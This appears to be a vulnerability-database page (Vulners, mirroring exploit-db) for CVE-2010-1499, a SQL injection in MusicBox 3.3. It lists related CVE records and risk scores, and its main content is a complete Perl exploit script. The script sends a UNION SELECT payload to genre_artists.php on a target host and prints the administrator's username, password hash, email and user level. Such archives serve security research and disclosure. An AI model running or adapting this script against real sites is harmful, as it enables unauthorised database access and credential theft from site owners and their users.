Lucene search
+L

MusicBox 3.3 - SQL Injection

🗓️ 20 Apr 2010 00:00:00Reported by CtacokType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

MusicBox v 3.3 SQL Injection exploit by Ctaco

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2010-1499
23 Apr 201014:00
cve
Cvelist
CVE-2010-1499
23 Apr 201014:00
cvelist
EUVD
EUVD-2010-1526
7 Oct 202500:30
euvd
NVD
CVE-2010-1499
23 Apr 201014:30
nvd
Prion
Sql injection
23 Apr 201014:30
prion
#!/usr/bin/perl
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# MusicBox v 3.3 SQL INJECTION EXPLOIT                       #\n";
print "# Author: Ctacok  (Russian)                                  #\n";
print "# Special for Antichat (forum.antichat.ru) and xakep.ru      #\n";
print "##############################################################\n";
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ \n\n";
print "\n userlevel 9 = SuperAdmin ";
print "\n pass = md5($pass)";
if (@ARGV < 2)
{
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vuln = "-1+union+select+1,2,concat(0x3a3a3a,userid,0x3a,username,0x3a,password,0x3a,email,0x3a,userlevel,0x3a3a3a),4,5,6,7+from+users+";
$doc = get($host.$path."genre_artists.php?id=".$vuln."--+&by=ASC");
if ($doc =~ /:::(.+):(.+):(.+):(.+):(.+):::/){
        print "\n[+] Admin id: : $1";
                print "\n[+] Admin username: $2";
                print "\n[+] Admin password: $3";
                print "\n[+] Admin email: $4";
                print "\n[+] Admin userlevel: $5";
}else{
                print "\n My name is Fail, Epic Fail... \n"
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Apr 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01313
26